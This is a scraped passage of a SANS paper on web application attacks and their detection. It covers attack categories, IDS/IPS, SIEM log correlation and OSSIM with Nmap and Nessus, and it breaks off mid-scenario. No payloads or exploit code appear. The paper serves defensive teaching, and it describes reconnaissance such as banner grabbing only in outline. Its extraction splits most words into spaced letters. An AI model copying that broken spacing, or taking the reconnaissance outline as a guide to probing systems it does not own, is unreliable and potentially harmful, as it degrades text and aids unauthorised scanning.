Srv Www Data Sans Php Rr Papers 2053
-
Upload
cmurrieta20092426 -
Category
Documents
-
view
235 -
download
0
Transcript of Srv Www Data Sans Php Rr Papers 2053
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 1/47
Interested in learningmore about security?
SANS Institute
InfoSec Reading RoomThis paper is from the SANS Institute Reading Room site. Reposting is not permitted without express written permission.
Web Based Attacks
Copyright SANS Institute
Author Retains Full Rights
A D
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 2/47
Web Based Attacks
GCI A Gol d Cer t i f i cat i on
Aut hor : J ust i n Cr i st , j cri st @secur ewor ks. com
Advi ser : J i m Pur cel l
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 3/47
Web Based At t acks
J ust i n Cr i st 2
Abstract
At t acks upon i nf or mat i on secur i t y i nf r ast r uct ur es have
cont i nued to evol ve st eadi l y over t i me; l egacy net wor k based
at t acks have l argel y been r epl aced by more sophi st i cated
web appl i cat i on based at t acks. Thi s paper wi l l i nt r oduce
and addr ess web based at t acks f r om at t ack t o det ect i on.
I nf or mat i on secur i t y pr of essi onal s new t o appl i cat i on l ayer
at t acks wi l l be i n a bet t er posi t i on t o under st and t he
under l yi ng appl i cat i on at t ack vect or s and met hods of
mi t i gat i on af t er r eadi ng t hi s paper .
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 4/47
Web Based At t acks
J ust i n Cr i st 3
Table of Contents
Abstract.................................................................... 2
Table of Contents........................................................... 3
Introduction:............................................................... 4
What is a web based attack?................................................. 5
Who is at risk from Web Based Attacks....................................... 7
Three Aspects of a Web Based Attack......................................... 8
Vul nerabi l i t y Pr event i on: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
At t ack: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
At t ack Det ect i on & Prevent i on: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Prevention/Detection Methods............................................... 11
Log Moni t or i ng and Cor r el at i on Tool s: . . . . . . . . . . . . . . . . . . . . . 12 OSSI M: For det ect i ng at t acks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 Propr i et ary Det ect i on/ Prevent i on Tool s: . . . . . . . . . . . . . . . . . . . 25
Wat chf i r e AppScan. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 Open Source Pr event i on Tool s: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Ni kt o. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30 WebScar ab. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Secure Coding.............................................................. 33
OWASP...................................................................... 34
Top Ten Hi ghl i ght s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35 SQL I nj ect i on At t ack Exampl e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39 Unval i dat ed I nput Exampl e: XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
Summary.................................................................... 42
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 5/47
Web Based At t acks
J ust i n Cr i st 4
Introduction:
Bef or e di scussi ng web appl i cat i on secur i t y or at t acks i t i s
vi t al l y i mpor t ant t o under st and t he evol ut i on of web
appl i cat i ons, t hei r i ncr easi ng compl exi t y and t he par amount
i mpor t ance t hat t hey pl ay i n over one bi l l i on peopl es’ l i ves
t oday ( I nt er net Wor l d St at s) .
The advent of f i r st gener at i on web appl i cat i ons was
sever el y l i mi t ed i n t hei r abi l i t y t o pr ovi de any mor e
i nf ormat i on t han a br ochur e you mi ght r ecei ve i n t he mai l .
St at i c HTML was pr ovi ded as a t ool t o di spl ay pi ct ur es and i ner t
i nf ormat i on. Consequent l y, as t he i nt ernet and web access becamemore and more ubi qui t ous so t oo di d t he needs of t hose users who
wer e accessi ng web appl i cat i ons. As a r esul t web appl i cat i ons
evol ved t o pr ovi de user conveni ences such as searchi ng, post i ng,
and upl oadi ng.
CGI , Common Gateway I nt er f ace pr otocol was t he f i r st l eap
f or war d i n t hi s pr ogr essi on. CGI pr ovi ded a means f or users t o
i nt er act wi t h web pages by submi t t i ng data i nt o f orms. Uponsubmi ssi on back end CGI scr i pt s woul d pr ocess t hi s data
present ed and r epr esent HTML back t o t he end user . CGI t hrough
t he i nt er act i on wi t h end users ef f ect i vel y became one of t he
f i r st web appl i cat i on at t ack vect or s known.
As ment i oned ear l i er web appl i cat i on devel opment di d not
st op wi t h CGI scr i pt s, i nst ead newer more evol ved f r ameworks
mani f est ed. PHP, ASP. NET, J 2EE, AJ AX, Ruby on Rai l s, and other s
emer ged t o i ncor por at e mor e i nt er act i ve f eat ur es whi ch al l ow
user s more f l exi bi l i t y and power when managi ng dat a and workf l ow
wi t hi n web appl i cat i ons.
Secur i ng web appl i cat i ons has become i ncr edi bl y i mport ant
as t he i nf ormat i on pr ocessed by web appl i cat i ons has become
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 6/47
Web Based At t acks
J ust i n Cr i st 5
cri t i cal t o cor por at i ons, cust omer s, or gani zat i ons, and
count r i es. Web appl i cat i ons manage a wi de arr ay of i nf ormat i on
i ncl udi ng f i nanci al dat a, medi cal r ecor ds, soci al secur i t y
number s, i nt el l ect ual pr oper t y and nat i onal secur i t y dat a. Web
appl i cat i ons must handl e t hi s i nf or mat i on secur el y whi l e
mai nt ai ni ng ef f i ci ency and avai l abi l i t y.
What is a web based attack?
Web based at t acks ar e consi der ed by secur i t y exper t s t o be
t he gr eat est and of t ent i mes t he l east under st ood of al l r i sks
rel at ed t o conf i dent i al i t y, avai l abi l i t y, and i nt egr i t y. ( ci t e)
The pur pose of a web based at t ack i s si gni f i cant l y di f f er entt hen ot her at t acks; i n most t r adi t i onal penet r at i on t est i ng
exer ci ses a net wor k or host i s t he t ar get of at t ack. Web based
at t acks f ocus on an appl i cat i on i t sel f and f unct i ons on l ayer 7
of t he OSI . J ohn Pescator e of t he Gar t ner gr oup cl ai ms t hat
near l y 70% of al l at t acks occur at t he appl i cat i on l ayer
( Desmond, 2004) .
Appl i cat i on vul ner abi l i t i es coul d pr ovi de t he means f ormal i ci ous end user s t o br each a syst em' s prot ect i on mechani sms
t ypi cal l y t o t ake advant age or gai n access t o pr i vat e
i nf or mat i on or syst em r esour ces. I nf or mat i on gat her ed can
i ncl ude soci al secur i t y number s, dat es of bi r t h, and mai den
names, whi ch ar e al l of t en used i n i dent i t y t hef t . Anot her
popul ar t ar get f or at t acker s i s credi t car d dat a whi ch l ef t
unpr ot ect ed and unencr ypt ed can be used t o cause si gni f i cant
damage to or gani zat i ons most val ued assets, t hei r cust omer s.
So what makes up an appl i cat i on at t ack? By def i ni t i on, al l
web appl i cat i on at t acks ar e compr i sed of at l east one normal
r equest or a modi f i ed r equest ai med at t aki ng advant age of poor
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 7/47
Web Based At t acks
J ust i n Cr i st 6
par amet er checki ng or i nst r uct i on spoof i ng. Ther e ar e si x
f undament al cat egor i es of appl i cat i on at t acks.
Spoofing:
Spoof i ng i s t he act of mi mi cki ng anot her user or pr ocess t o
per f or m a t ask or r et r i eve i nf or mat i on t hat woul d nor mal l y not
be al l owed. An at t acker coul d use a cr af t ed HTTP r equest
cont ai ni ng t he sessi on i d i nf or mat i on f r om anot her user and
r et r i eve t he tar get ed user s account i nf or mat i on.
Repudiation:
I n or der t o t i e speci f i c acti ons of a si ngl e user ,
appl i cat i ons must have r easonabl e r epudi at i on cont r ol s such as
web access, aut hent i cat i on, and dat abase t r ansact i on l ogs.
Wi t hout cor r obor at i ng l ogs, onl i ne web appl i cat i on user s coul d
easi l y cl ai m t hat t hey di d not t r ansf er equi t i es f r om one acct
t o an ext er nal acct of anot her . Ot her wi se wi t hout pr oof
ot her wi se al l onl i ne br oker ages woul d be r equi r ed t o rei mbur se
t he cl i ent f or l ost f unds. Aggr egat i ng and cor r el at i ng l ogs
f r om mul t i pl e sour ces ( web appl i cat i on, mi ddl ewar e, anddat abase) can pr event r epudi at i on at t acks.
Information Disclosure:
I nf or mat i on di scl osur e i s one of t he bi ggest t hr eat s t o
l ar ge or gani zat i ons who mai nt ai n pr i vat e i nf or mat i on about t hei r
cust omer base. When at t acker s ar e capabl e of r eveal i ng pr i vat e
i nf ormat i on about a user or user s of a web si t e, consumer
conf i dence i n t hat or gani zat i on can t ake dr ast i c hi t s; causi ngl oss i n sal es, st ock pr i ce, and over al l mar ket abi l i t y. To
pr event t hi s, appl i cat i ons must r equi r e adequat e cont r ol s whi ch
wi l l pr event user I D and sessi on mani pul at i on.
Denial of Service:
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 8/47
Web Based At t acks
J ust i n Cr i st 7
Deni al of ser vi ce at t acks ar e l i kel y t he most wel l known of
al l appl i cat i on at t acks, of t en gener at ed by mal i ci ous user s,
compet i t or s or scr i pt ki ddi es. Mot i vat i ons f or t hi s t ype of an
at t ack r ange f r om per sonal t o pol i t i cal r easons i n hopes of
st i f l i ng an or gani zat i on’ s abi l i t y t o f i el d onl i ne busi ness.
Famous exampl es i ncl ude at t acks upon SCO a coupl e of years ago
by i ndi vi dual s upset about l awsui t s ai med at LI NUX.
Elevation of Privileges:
Aut hor i zat i on cont r ol s whi ch ar e bot h r el i abl e and st aunch
ar e requi si t e f or any syst em or appl i cat i on whi ch guar ds
sensi t i ve i nf or mat i on. Escal at i on of pr i vi l eges r equi r es a
mal i ci ous user t o ei t her al r eady possess or gai n t hr ough
unl awf ul met hods aut hor i zat i on pr i vi l eges of a r egul ar user .
Once t he mal i ci ous user i s l ogged i nt o t he vi ct i m syst em an
at t empt wi l l be made by expl oi t at i on of an appl i cat i on t hr ough
poor par amet er checki ng or i nst r uct i on spoof i ng.
Who is at risk from Web Based Attacks
Al l or gani zat i ons whi ch mai nt ai n a web pr esence ar e at r i sk
of bei ng at t acked. However , t he l evel of r i sk i s di f f er ent f or
each or gani zat i on. A coupl e of f act or s t hat pl ay i nt o
consi der at i on when det er mi ni ng t he t hr eat l evel ar e i nt el l ect ual
pr oper t y or per sonal l y i dent i f i abl e i nf or mat i on st or ed by t he
or gani zat i on.
Intellectual property:
I nt el l ectual pr oper t y i s a pr oduct of t he i nt el l ect t hat
has commerci al val ue, i ncl udi ng copyr i ght ed pr opert y such as
l i t er ar y or ar t i st i c wor ks, and i deat i onal pr oper t y, such as
pat ent s, appel l at i ons of or i gi n, busi ness met hods, and
i ndust r i al pr ocesses. Compani es wher e success and r eput at i on are
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 9/47
Web Based At t acks
J ust i n Cr i st 8
bui l t upon pat ent s, r esear ch, and devel opment ar e especi al l y at
r i sk. Gr eat exampl es i ncl ude phar maceut i cal compani es, chi p
f abr i cat or s and uni ver si t i es.
Personally Identifiable Information:
Near l y al l or gani zat i ons whi ch i nt er f ace wi t h cust omer s
hol d t o some degr ee i nf ormat i on whi ch i s consi der ed t o be
sensi t i ve. For att acker s to per pet r at e f i nanci al cri mes or
i dent i t y t hef t t hey need credi t card number s, phone number s,
addr esses, heal t h r el ated i nf ormat i on, bank account number s
( Kr ebs, 2006) . As such t hi s i nf ormat i on has become a commodi t y
i n underground I RC chat r ooms.
Three Aspects of a Web Based Attack
Vulnerability Prevention:
The f i r st st ep i n a comprehensi ve appl i cat i on secur i t y
f r amewor k st ar t s wi t h devel oper s. Sof t war e ar chi t ect ur e j ust
l i ke bui l di ng physi cal st r uct ur es r equi r es sound pl anni ng and
oversi ght , wi t h an adherence t o f undament al sof t ware devel opment
l i f ecycl e met hodol ogi es. Many sof t war e devel oper s car r y t he
ski l l s t o pr oper l y pr oof r ead and l ocat e vul ner abi l i t i es.
However as an i nsur ance pol i cy of sor t s expl oi t at i on det ect i on
t ool s ar e r equi r ed t o pr ovi de a st andar d l evel of er r or
checki ng.
Attack:
I t f or f i r st necessar y f or i ndi vi dual s i nt er ested i nconduct i ng an appl i cat i on based at t ack i t i s f i r st necessar y t o
under st and and i dent i f y a t ar get syst em. Thi s f i r st st age i n an
at t ack i s commonl y r ef er r ed t o as reconnai ssance; r econnai ssance
can be per f ormed usi ng a var i et y of t ool s such as port scanner s
and vul ner abi l i t y scanner s. These scanner s ar e of t en f l exi bl e
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 10/47
Web Based At t acks
J ust i n Cr i st 9
enough t o l ook f or speci f i c l i st eni ng por t s associ at ed wi t h
suspect ed vul ner abl e appl i cat i ons. Appl i cat i on ver si on det ect i on
can be per f ormed by banner gr abbi ng. Banner gr abbi ng i s t he
pr ocess of connect i ng t o a host on a speci f i c TCP/ UDP port and
l i st eni ng t o what t he host r epl i es wi t h. Once a connect i on i s
est abl i shed appl i cat i ons wi l l commonl y i dent i f y or pr ovi de a
ver si on or bui l d i nf or mat i on r el evant t o t he appl i cat i on t hat
host i s usi ng. By gr abbi ng banner s at t acker s ar e qui ckl y abl e
t o cross r ef er ence appl i cat i on ver si ons, pat ch l evel s, and bui l d
i nf or mat i on t o onl i ne r ef er ences whi ch l i st vul ner abl e
appl i cat i ons. I n addi t i on t o onl i ne r esour ces whi ch l i st
vul ner abl e appl i cat i ons many f r eel y avai l abl e t ool s cont ai n sel f cont ai ned and dynami cal l y updat i ng databases whi ch per f orm
appl i cat i on mappi ng t o cur r ent vul ner abi l i t i es. A cl oser i n
dept h l ook at sever al of t hese wi l l f ol l ow i n a l at er sect i on.
Attack Detection & Prevention:
I nt r usi on Det ect i on Syst ems ( I DS) and I nt r usi on
Pr event i on syst ems ( I PS) ar e al so used as det ect i ve and r eact i ve
devi ces f or bot h net wor k and appl i cat i on t ar get ed at t acks. They
are commonl y depl oyed wi t hi n the demi l i t ar i zed zones ( DMZs) of
cor por at e net wor ks and ei t her passi vel y f i l t er or act i vel y bl ock
at t acks t ar get ed at appl i cat i on l ayer servi ces. I DSs and I PSs
bot h wor k at t he net wor k l ayer by l i st eni ng t o net wor k t r af f i c
dest i ned to pr ot ect ed syst ems f or at t acks agai nst vul ner abl e
ser vi ces, dat a mani pul at i on at t acks on appl i cat i ons, pr i vi l ege
escal at i on on host s, mul t i pl e f ai l ed unaut hor i zed l ogi ns, and
even access t o sensi t i ve dat a. Upon successf ul det ect i on; I DS
al er t s are usual l y sent t o a cent r al consol e wher e act i on by an
anal yst can be t aken. I nt r usi on Prevent i on Syst ems upon
det ect i on of an at t ack, can dr op t he packet s, send TCP r esets t o
t he of f endi ng I P or shun f ur t her connect i ons by mal i ci ous
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 11/47
Web Based At t acks
J ust i n Cr i st 10
at t acker s f or a var i abl e per i od of t i me. Some I nt r usi on
Det ect i on Syst ems have t he abi l i t y t o t hwar t of f endi ng at t acker s
by communi cat i ng di r ect l y wi t h a f i r ewal l or r out er t o bl ock t he
sour ce I P addr ess.
Rever se web proxi es ar e one of many t ool s t hat can be used
t o not onl y det ect , but pr ot ect an appl i cat i on ser ver f r om
unaut hor i zed, mal i ci ous, or i nappr opr i at e cal l s, post s, or
quer i es t o onl i ne web appl i cat i ons, ser vi ces and dat abases. A
r ever se web pr oxy wor ks by i nt er cept i ng t r af f i c dest i ned t o a
pr ot ect ed web appl i cat i on or ser vi ce and t hen appl i es f i l t er s t o
det ect mal i ci ous commands, bad synt ax, i nappr opr i ate cont ent ,
and t he l i ke. By st andi ng i n f r ont of t he web appl i cat i ons,
t hi s al l ows t he web appl i cat i on t o f ocus on l egi t i mat e r equest s.
Many f i r ewal l s sol d i n t he mar ket pl ace t oday ar e
appl i cat i on aware and as such underst and many of t he ubi qui t ous
pr ot ocol s and commands. I n underst andi ng t hese prot ocol s and
appl i cat i ons t hey ar e abl e t o ascer t ai n whet her or not t r af f i c
dest i ned f or an appl i cat i on or net wor k based ser vi ce i s
mal i ci ous or not . Common appl i cat i ons i ncl ude t el net , SSH,
HTTP, FTP, SMTP and SI P. When t uned pr oper l y t hese f i r ewal l s
ar e capabl e of t hwar t i ng many common at t acks waged agai nst
vul ner abl e appl i cat i ons or pr ot ocol s. Upon i nspect i on of
mal i ci ous payl oads or commands sent t o an appl i cat i on, t hese
advanced f i r ewal l s wi l l usual l y of f er t he abi l i t y t o dr op
mal i ci ous packet s, enact t empor ar y or per manent f i l t er s agai nst
al l t r af f i c dest i ned f r om t he of f endi ng I P, or send an al er t t o
secur i t y per sonnel so t hat f ur t her act i on can be taken.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 12/47
Web Based At t acks
J ust i n Cr i st 11
Prevention/Detection Methods
Many met hodol ogi es exi st , and t her e i s never one r i ght
sol ut i on or ar chi t ect ur e f or al l envi r onment s. Pr evi ousl y
di scussed, t here are more passi ve methods whi ch i ncl ude
I nt r usi on Det ect i on Syst ems ( I DS) . I DS syst ems si mpl y al er t on
seemi ngl y of f ensi ve t r af f i c whi ch i s dest i ned t owar ds a
pr ot ect ed asset or appl i cat i on. On t he opposi t e spect r um t her e
are more pr event at i ve met hods whi ch i ncl ude appl i cat i on- aware
f i r ewal l s, r ever se pr oxi es, and I nt r usi on Det ect i on Pr event i on
( I DP) whi ch not onl y act i vel y moni t or f or at t acks but t hey
at t empt t o bl ock or change t he envi r onment such t hat f ur t her
at t acks are not successf ul i n r eachi ng t he pr ot ect ed appl i cat i on
or syst em.
For envi r onment s whi ch cont ai n known of f t he shel f
appl i cat i ons whi ch ar e usi ng common pr ot ocol s such as FTP, HTTP,
HTTPS, SMTP, and ot her s I DP can be ver y ef f ect i ve i n pr ot ect i ng
asset s i n a r eact i ve f ashi on. For t hose l ar ger envi r onment s
whi ch cont ai n home gr own appl i cat i ons, oddl y conf i gur ed
appl i cat i on and ser vi ce por t s, or syst ems whi ch do not f ol l ow
RFC st andar ds when communi cat i ng, I DS may be a mor e i ntel l i gent
sol ut i on.
The r eason i s si mpl e; I DP sol ut i ons t ypi cal l y bl ock
mal i ci ous t r af f i c, or t r af f i c whi ch does not adher e t o RFC
st andards. RFC st andards or Request s f or Comment s are rul es
commi ssi oned by t he I ETF whi ch di ct at e pr oper communi cat i on
met hods and pr act i ces f or near l y al l wel l known pr ot ocol s i n use
on t he i nternet t oday. Many t hi r d par t y or home grown
appl i cat i ons ar e bui l t wi t h one pur pose i n mi nd, t o wor k. The
adher ence of a par t i cul ar appl i cat i on or ser vi ce t o an RFC
st andar d i s ver y r ar el y a pr i or i t y f or appl i cat i on devel oper s.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 13/47
Web Based At t acks
J ust i n Cr i st 12
As such, appl i cat i ons, especi al l y l egacy appl i cat i ons ar e of t en
put t oget her i n a hast y f ashi on wi t h l i t t l e r egar d wi t h how i t
may or may not be af f ect ed by a secur i t y devi ce such as I DP. I t
shoul d be underst ood t hat I DP has onl y been around f or a coupl e
of year s and i s st i l l a mat ur i ng t echnol ogy.
Addi t i onal l y l og anal ysi s on cri t i cal f i l es whi ch ar e used
by bot h appl i cat i ons and t hei r under l yi ng syst ems can pr ovi de
good i ndi cat i ons as t o when an i nt r usi on or unsuccessf ul
penet r at i on has occur r ed. Ther e ar e a var i et y of bot h open
sour ce and pr opr i et ar y t ool s whi ch of f er t he abi l i t y t o moni t or
key conf i gur at i on f i l es ( i nt egr i t y checker ) , and l og f i l es ( l og
cor r el at i on and moni t or i ng t ool s) . We wi l l di scuss exampl es of
each of t hese i n t he next sect i on.
Log Monitoring and Correlation Tools:
Gar t ner has i dent i f i ed SI EMs or Secur i t y I nf or mat i on and
Event Manager s as a means t o pr ovi de “r eal - t i me event management
and hi st or i cal anal ysi s of secur i t y dat a f r om a wi de set of
het er ogeneous sour ces” ( Gart ner , 2005) .
I n l ar ger or gani zat i ons whi ch of t en f eat ur e a mul t i t ude of
ser ver s spr ead acr oss di f f er ent geogr aphi es, l og anal ysi s and
r evi ew becomes i ncr easi ngl y di f f i cul t and l abor some. “Thi s
st r eam of event s and al er t s—Gart ner est i mates t hat t he syst ems
i n compani es wi t h more t han 1000 user s gener at e over 200
secur i t y "event s" per second—i s enough to over whel m any I T
depart ment ”, notes J ason Hal l oway of ExaProtect ( Hal l oway,
ExaPr ot ect ) .
I n t hi s exampl e, i f an admi ni st r at or or secur i t y mi nded
engi neer wi shes t o pr oact i vel y revi ew t he l ogs of hi s or her
managed syst ems a number of st eps must ensue.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 14/47
Web Based At t acks
J ust i n Cr i st 13
1. I t woul d be necessary t o remotel y l ogi n t o t hese syst ems
one at a t i me.
2. Fi l t er l og f i l es f or i nt er est i ng event s.
3. Mat ch t hese ‘ i nt er est i ng’ event s wi t h ot her si mi l ar event s
on ot her managed syst ems.
Thi s process was i dent i f i ed as f ar t oo t i me consumi ng,
t edi ous, and pr one t o er r or s or mi st akes. Wi t h t hi s pr obl em
came the advent of l og moni t or i ng and cor r el at i on tool s whi ch
serve t o f i l t er and match a l og event on one devi ce or
appl i cat i on t o a compl i ment ar y or si mi l ar event on anot her
syst em. Bei ng pr i vy t o t he l ogs or event s whi ch ar e occur r i ngon di f f er ent syst ems can l ead t o mor e i nt el l i gent deci si ons
about t he sour ce of an at t ack, a mi sconf i gur at i on of an
appl i cat i on or syst em, or even an i nt er nal user who wi shes t o
cause har m.
SI EM sol ut i ons are pr eval ent and t her e ar e a number of bot h
pr opr i et ar y and open sour ce al t er nat i ves avai l abl e. Ar cSi ght ,
net For ensi cs, Sent i nel , and I nt el l i t acti cs ar e but a f ewpr opr i et ar y sol ut i ons that ar e avai l abl e ( Gar t ner , 2006) . Open
sour ce sol ut i ons ar e al so at t r act i ve f or smal l er busi nesses t hat
may not have t he budget f or pr opr i et ary sol ut i ons whi ch
of t ent i mes of f er bet t er scal e and mor e r obust suppor t . OSSI M,
or t he Open Sour ce Secur i t y I nf ormat i on Management t ool i s a
popul ar choi ce amongst t he open sour ce communi t y. I t of f er s
many of t he f eat ur es of pr opr i et ar y sol ut i ons wi t hout t he hi gh
cost and l i censi ng f ees. A f ew scr een shot s have been added
bel ow.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 15/47
Web Based At t acks
J ust i n Cr i st 14
Here we can see si gnat ure mat ches by sour ce address,
dest i nat i on, et c. These can be sor t ed by t he var i ous col umns
and can hel p secur i t y anal yst s determi ne common denomi nat ors i n
an at t ack.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 16/47
Web Based At t acks
J ust i n Cr i st 15
Thi s scr eenshot shows t he act ual packet broken down i nt o
t he di f f er ent l ayer s of t he TCP/ I P st ack. Thi s wi l l be hel pf ul
i n anal yzi ng I DS si gnat ur es of val i d at t acks and even
mi sconf i gur at i ons i n appl i cat i ons and syst ems.
Al l scr eenshot s wer e t aken f r om www. ossi m. net .
OSSIM: For detecting attacks
The l ar ger a gi ven or gani zat i ons’ i nf r ast r uct ure t he mor e
di f f i cul t i t becomes t o be pr oact i ve about det ect i ng at t acks
bef ore t hey can bur geon i nt o wi de scal e pr obl ems. The r easons
are numerous but can be nar r owed t o t he f ol l owi ng:
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 17/47
Web Based At t acks
J ust i n Cr i st 16
Syst ems are of t en di st r i but ed acr oss di spar at e net wor ks i n
di f f er ent par t s of a busi ness uni t , count r y, and even cont i nent .
Di ver se or gani zat i ons, t eams, and busi ness uni t s wi t h di f f er ent
at t i t udes manage t hese di spar ate net works. As a r esul t
pat chi ng, bui l d pr ocedur es, net wor k secur i t y, and gener al
secur i t y best pr act i ces can t ake a back seat t o other r evenue
gener at i ng acti vi t i es.
Of t ent i mes di f f er ent conf i gur at i on st andar ds and pol i ci es
may be t he r esul t of r egul at ory requi r ement s, government
r est r i ct i ons, and gover nment suppor t ed expor t r est r i ct i ons. I t
qui ckl y becomes obvi ous t hat Secur i t y Anal yst s ar e f aced wi t h a
st agger i ng t ask. I n or der t o per f or m t he j ob successf ul l y
secur i t y anal yst s are r equi r ed t o under st and a net wor k t opol ogy
t hat may span a mul t i t ude of count r i es. Achi evi ng t hi s t hor ough
under st andi ng of t he l ay of t he l and i s of t en much easi er sai d
t han done.
To assi st , SI M packages coupl ed wi t h networ k r econnai ssance
t ool s ar e of t en used t o map out net wor k t opol ogi es. OSSI M i s an
open sour ce Secur i t y I nf ormat i on Manager t hat i ncl udes Nessus, a
ver y popul ar and f r eel y avai l abl e vul ner abi l i t y scanner and
NMAP, of t en consi der ed t o be one of t he best avai l abl e net work
mappi ng t ool s. Bot h Nessus and NMAP possess t he abi l i t y t o map
network spaces. Network pr obi ng and t he di f f erent methods of
net work di scover y are beyond t he scope of t hi s paper . To
compr ehend t he f or t hcomi ng exampl e i t i s onl y necessary to
under st and that Nmap al l ows a secur i t y anal yst t o scan net worksand vi sual l y map t hese net works. These pi ct ur es or
vi sual i zat i ons al l ow secur i t y anal yst s t o under st and t he i nner
worki ngs of t hei r mapped net works. Wi t hout t hese maps, l earni ng
cur ves ar e si gni f i cant l y st eeper , and of t en br eed unnecessary
conf usi on amongst secur i t y anal yst s r esponsi bl e f or t he net wor k,
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 18/47
Web Based At t acks
J ust i n Cr i st 17
net work users, and net work admi ni st r ators. A l ayman can t hi nk
of a net wor k map as a st r eet map. St r eet maps encourage common
under st andi ng by t hose t hat use t he roads and t hose t hat pr ovi de
di r ecti ons.
For t hi s par t i cul ar exampl e we wi l l be usi ng Nmap and
Nessus. Fi r st , Nmap i s i ni t i at ed t o pr obe I P addr ess space whi ch
i s owned by t he par ent or gani zat i on of t he secur i t y anal yst .
The r esul t s of t hi s scan wi l l yi el d al l l i st eni ng devi ces wi t h a
TCP/ I P st ack t hat ar e r esponsi ve t o a var i et y of I CMP, TCP, and
UDP sweeps.
Fol l owi ng t he successf ul r un of Nmap, A Nessus scan i s
i ni t i at ed f r om wi t hi n OSSI M agai nst pr evi ousl y di scover ed
net wor k host s f or vul ner abi l i t i es. Af t er scanni ng i s compl et ed
a l i st of known vul ner abi l i t i es of t he scanned host s ar e st or ed
wi t hi n t he OSSI M dat abase.
Nessus sampl e out put f or one host has been di spl ayed bel ow.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 19/47
Web Based At t acks
J ust i n Cr i st 18
Because t here ar e near l y al ways goi ng t o be emergi ng
t hr eat s and unpat ched vul ner abi l i t i es i s i t necessar y t o creat e
a r i sk r at i ng. OSSI M uses t he f ol l owi ng met hodol ogy t o quant i f y
r i sk. Thi s i s i mpor t ant t o under st and f or t he secur i t y anal yst .
These quant i f i cat i ons of r i sk al l ow an anal yst t o pr i or i t i ze hi s
or her at t ent i on t owar ds t he most bur ni ng i ssues.
Risk = (Asset * Priority * Reliability)/10
Wher e:
Asset ( 0- 5)
Pr i or i t y ( 0- 5)
Rel i abi l i t y ( 0- 5)
The computed risk rating will always be between 0 and 10.
Asset Value
I n det er mi ni ng asset val ues, t he asset owner or data owneri s gener al l y r esponsi bl e f or cl assi f yi ng t hi s f or t he secur i t y
anal yst . Thi s st ep shoul d not be over l ooked as i t enabl es
secur i t y anal yst s t o have an under st andi ng of cri t i cal i t y
amongst t he var i ous net work host s. Based upon t hi s f eedback an
asset can be t agged wi t h a val ue f r om 0- 5. Cust omer data,
i nt el l ect ual pr oper t y and t he l i ke mi ght be t agged wi t h a 4 or
5. Whi l e t he syst em t hat st ores the l unch menu f or t he
caf et er i a may r ecei ve a l ower score, 0. These numer i cal val ues
hel p an or gani zat i on pr i or i t i ze t hei r secur i t y ef f or t s, DR, and
ot her cont i ngency pl ans.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 20/47
Web Based At t acks
J ust i n Cr i st 19
Priority/Threat
Pr i or i t y or t hr eat r ef er s to t he si gni f i cance of a
part i cul ar at t ack on a managed asset . I n other words, what
mi ght be t he di sr upt i on t o my envi r onment i n the event t hat a
par t i cul ar vul ner abi l i t y i s bei ng exposed? OSSI M i s abl e t o
make deci si ons r el at i ve t o t he envi r onment t hat i s under at t ack
r egar di ng pr i or i t y.
A common scenar i o whi ch OSSI M i s abl e to hel p i s descr i bed
i n t he f ol l owi ng scenar i o.
A Mi cr osof t Wi ndows t ar get ed vi r us code r ed has i nf i l t r at ed t he
cor por at e net wor k f r om t he i nt er net . Thr ough t he use of snor t ,
